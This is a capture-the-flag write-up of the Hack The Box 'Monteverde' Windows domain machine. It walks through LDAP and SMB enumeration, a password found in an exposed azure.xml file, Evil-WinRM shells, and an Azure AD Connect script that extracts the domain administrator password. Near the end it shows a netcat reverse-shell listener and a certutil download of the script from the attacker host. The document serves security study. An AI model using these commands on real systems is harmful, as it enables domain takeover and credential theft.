As always we start with an nmap scan
# Nmap 7.80 scan initiated Mon Jan 13 07:39:41 2020 as: nmap -A -oN fullscan-A 10.10.10.172 Nmap scan report for 10.10.10.172 Host is up (0.081s latency). Not shown: 989 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-13 12:50:36Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=1/13%Time=5E1C651E%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 2 hops Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 10m42s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-01-13T12:53:03 |_ start_date: N/A TRACEROUTE (using port 135/tcp) HOP RTT ADDRESS 1 104.46 ms 10.10.16.1 2 104.61 ms 10.10.10.172 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jan 13 07:44:56 2020 -- 1 IP address (1 host up) scanned in 315.99 seconds
I found the users with:
root@kali:~/htb/monteverde# ldapsearch -h 10.10.10.172 -p 389 -x -b "dc=MEGABANK,dc=LOCAL" > ldaplogall.txt
# Azure Admins, Groups, MEGABANK.LOCAL dn: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL objectClass: top objectClass: group cn: Azure Admins member: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL member: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL member: CN=Administrator,CN=Users,DC=MEGABANK,DC=LOCAL distinguishedName: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL instanceType: 4 whenCreated: 20200103001011.0Z whenChanged: 20200103001032.0Z uSNCreated: 36889 uSNChanged: 36897 name: Azure Admins objectGUID:: iCAImwQrNUW6YeEQTXxy+w== objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UKQoAAA== sAMAccountName: Azure Admins sAMAccountType: 268435456 groupType: -2147483646 objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL dSCorePropagationData: 20200103123551.0Z dSCorePropagationData: 16010101000001.0Z
root@kali:~/htb/monteverde# smbmap -u SABatchJobs -p SABatchJobs -d MEGABANK -H 10.10.10.172 [+] Finding open SMB ports.... [+] User SMB session establishd on 10.10.10.172... [+] IP: 10.10.10.172:445 Name: MEGABANK.local Disk Permissions ---- ----------- ADMIN$ NO ACCESS azure_uploads READ ONLY C$ NO ACCESS E$ NO ACCESS IPC$ READ ONLY NETLOGON READ ONLY SYSVOL READ ONLY users$ READ ONLY
root@kali:~/htb/monteverde# smbclient //10.10.10.172/users$ -U SABatchJobs Enter WORKGROUP\SABatchJobs's password: SABatchJobs Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Jan 3 08:12:48 2020 .. D 0 Fri Jan 3 08:12:48 2020 dgalanos D 0 Fri Jan 3 08:12:30 2020 mhope D 0 Fri Jan 3 08:41:18 2020 roleary D 0 Fri Jan 3 08:10:30 2020 smorgan D 0 Fri Jan 3 08:10:24 2020 524031 blocks of size 4096. 519955 blocks available smb: \> cd mhope smb: \mhope\> dir . D 0 Fri Jan 3 08:41:18 2020 .. D 0 Fri Jan 3 08:41:18 2020 azure.xml AR 1212 Fri Jan 3 08:40:23 2020 524031 blocks of size 4096. 519955 blocks available smb: \mhope\> get azure.xml getting file \mhope\azure.xml of size 1212 as azure.xml (6.0 KiloBytes/sec) (average 6.0 KiloBytes/sec) smb: \mhope\>
root@kali:~/htb/monteverde# smbclient //10.10.10.172/users$ -U SABatchJobs Enter WORKGROUP\SABatchJobs's password: SABatchJobs Try "help" to get a list of possible commands. smb: > ls . D 0 Fri Jan 3 08:12:48 2020 .. D 0 Fri Jan 3 08:12:48 2020 dgalanos D 0 Fri Jan 3 08:12:30 2020 mhope D 0 Fri Jan 3 08:41:18 2020 roleary D 0 Fri Jan 3 08:10:30 2020 smorgan D 0 Fri Jan 3 08:10:24 2020
root@kali:~/htb/monteverde# cat azure.xml <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T> <T>System.Object</T> </TN> <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString> <Props> <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT> <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT> <G N="KeyId">00000000-0000-0000-0000-000000000000</G> <S N="Password">4n0therD4y@n0th3r$</S> </Props> </Obj>
Because the file was in the “mhope” users directory, you can guess that this is his password: mhope: 4n0therD4y@n0th3r$
With evil-winrm you can connect to the victim and get the user’s flag:
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$' Info: Starting Evil-WinRM shell v1.6 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\mhope\Documents> cd .. *Evil-WinRM* PS C:\Users\mhope> cd Desktop *Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt 4961976bd7d8f4eeb2ce3705e2f212f2
getting Root
If you look at the rights of this user, you can see that he is a member of the Azure Admins group:
Which means he can run a DCSync.
Running the attack is as easy as downloading the PS1 script from:
https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
more info in: https://blog.xpnsec.com/azuread-connect-for-redteam/
Next we execute:
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$' *Evil-WinRM* PS C:\Users\mhope\Documents> upload /root/htb/monteverde/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\shellcode.xml Info: Uploading /root/htb/monteverde/Azure-ADConnect.ps1 to c:\windows\system32\spool\drivers\color\shellcode.xml Data: 3016 bytes of 3016 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ren shellcode.xml Azure-ADConnect.ps1 *Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ./Azure-ADConnect.ps1 *Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Import-Module ./Azure-ADConnect.ps1 *Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Azure-ADConnect -server 127.0.0.1 -db ADSync [+] Domain: MEGABANK.LOCAL [+] Username: administrator [+]Password: d0m@in4dminyeah!
With the password of the administrator you can log in via winrm and get the root
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u administrator -p 'd0m@in4dminyeah!' Info: Starting Evil-WinRM shell v1.6 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> *Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt 12909612d25c8dcf6e5a07d1a804a0bc
After some failures:
root@kali:~/htb/monteverde# impacket-smbserver share ./ Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed
C:\windows\system32\spool\drivers\color>copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1 copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1 You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack. Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
root@kali:~/htb# rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.10.16.70] from (UNKNOWN) [10.10.10.172] 61971 Microsoft Windows [Version 10.0.17763.914] (c) 2018 Microsoft Corporation. All rights reserved. C:\windows\system32\spool\drivers\color>whoami /all whoami /all USER INFORMATION ---------------- User Name SID ============== ============================================ megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601 --snip-- C:\windows\system32\spool\drivers\color>powershell -nop -Exec Bypass certutil -urlcache -split -f http://10.10.16.70/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1 This script contains malicious content and has been blocked by your antivirus software.
Author : Puckiestyle